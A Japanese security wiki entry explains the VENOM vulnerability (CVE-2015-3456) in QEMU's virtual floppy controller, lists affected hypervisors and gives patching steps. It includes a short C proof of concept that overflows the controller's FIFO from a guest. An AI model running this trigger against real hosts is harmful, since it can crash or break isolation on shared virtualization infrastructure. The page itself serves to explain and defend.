CVE-2015-3456 VENOM

提供: セキュリティ
移動: 案内検索
スポンサーリンク

CVE-2015-3456 VENOM(Virtualized Environment Neglected Operations Manipulation)とは、オープンソースのエミュレータ QEMU を利用した脆弱性です。

読み方

VENOM
ぶいえーえぬおーえむ
Virtualized Environment Neglected Operations Manipulation
ばーちゃらいずど えんばいあろめんと ねぐれくてっど おぺれーしょんず まにぴゅれーしょん

概要

ゲストOS同士は、本来、分離された環境であるため、相互に影響を及ぼすことはありません。ゲストOSからホストOSに対しても同様です。VENOMの脆弱性を利用することで、ゲストOSからホストと他のゲストOSへアクセス・任意のコードの実行が可能になります。

この問題は、QEMUの仮想フロッピードライブコントローラ(fdc)のコードに存在するバッファオーバーフロー脆弱性を悪用された場合に引き起こされます。

影響を受ける仮想化環境

  • Xen
  • KVM
  • VirtualBox

影響を受けない仮想化環境

対応方法

QEMUのパッケージをアップデートする必要があります。

  1. qemu kvm のパッケージを更新します。
  2. ゲストOS(仮想マシン)の電源をオフにします。
  3. ゲストOSをあらためて、電源をオンにしてください。

ゲストOSのリブートだけでは、不十分と言われています。それは、QEMUのパッケージを更新しても、パッケージを更新中に実行中のKVMが古いQEMUバイナリを参照している可能性があるからです。

CentOS

$ sudo yum update
$ sudo yum update qemu-kvm

Ubuntu

sudo apt-get clean
sudo apt update
sudo apt upgrade

検証コード

PoCは、以下のコードです。

#include <sys/io.h>
 
#define FIFO 0x3f5
 
int main() {
        int i;
        iopl(3);
 
        outb(0x0a,0x3f5); /* READ ID */
        for (i=0;i<10000000;i++) {
                outb(0x42,0x3f5); /* push */
	}
}

パッチ

関連項目




スポンサーリンク